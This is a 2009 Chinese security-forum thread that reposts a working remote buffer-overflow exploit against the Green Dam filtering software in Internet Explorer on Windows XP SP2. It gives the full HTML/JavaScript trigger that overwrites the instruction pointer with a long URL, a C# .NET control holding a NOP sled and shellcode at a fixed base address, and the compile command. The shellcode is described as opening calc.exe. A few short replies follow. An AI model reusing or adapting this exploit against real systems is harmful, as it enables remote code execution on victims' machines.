Board logo

标题: [转]绿坝-花季护航的IE浏览器 Exploit [打印本页]

作者: 匿名    时间: 2009-8-3 10:43     标题: [转]绿坝-花季护航的IE浏览器 Exploit

出来好久了!很多人已经看过了,不过里面是用的.net控件加载shellcode的,放论坛里面备记一下。

html部分:
<html>

<!-- Green Dam Remote Buffer Overflow(shellcode for WinXP sp2) -->
<!-- by Seer[N.N.U] 101702333@qq.com / raven87033@hotmail.com -->


<head>
<script>
function x()
{
var url='';
for(var i=1; i<=2035; i++)
url += '$'; // '$' = 0x24, eip = 0x24242424, hum?;-)

window.location=url + '.html';
}
</script>


</head>

<body>

<object classID="exploit.dll#exploit.Shellcode"></object>
<!--Deploy shellcode in browser process at base address 0x24242xxx-->

<input type="button" value="fire" onclick="x()" />
</body>

</html>


.net dll部分:
using System;
using System.Windows.Forms;

namespace exploit
{
public partial class Shellcode : UserControl
{
public Shellcode()
{
// Shellcode that opens calc.exe on WinXP sp2
// THOSE NOPS ARE NECESSARY, DO NOT REMOVE THEM WHEN U CHANGE SHELLCODE
String shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u8b55\u33ec\u52d2\u5252\u45c6\u63f7\u45c6\u61f8\u45c6\u6cf9\u45c6\u63fa\u45c6\u2efb\u45c6\u65fc\u45c6\u78fd\u45c6\u65fe\u458d\u50f7\ub890\u114D\u7C86\ud0ff\ub890\uCAA2\u7C81\ud0ff\u9090";
}
}
}

编译方法:

Compile the c# .net binary which contains shellcode with the following instruction on VS environment:

CSC /nologo /target:library /platform:x86 /noconfig /baseaddress:0x24240000 /reference:C:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\System.dll /reference:C:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\System.Windows.Forms.dll /out:exploit.dll exploit.cs
作者: yyw258520    时间: 2009-8-3 12:45

和我在黑X书上看到的不一样!那个是直接找密码文件!破密码喔!
作者: xiaoqilinux    时间: 2009-10-21 03:38


作者: exists    时间: 2009-10-27 22:45

不知道这个溢出后的结果是什么样的?能不能有截图呢?




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2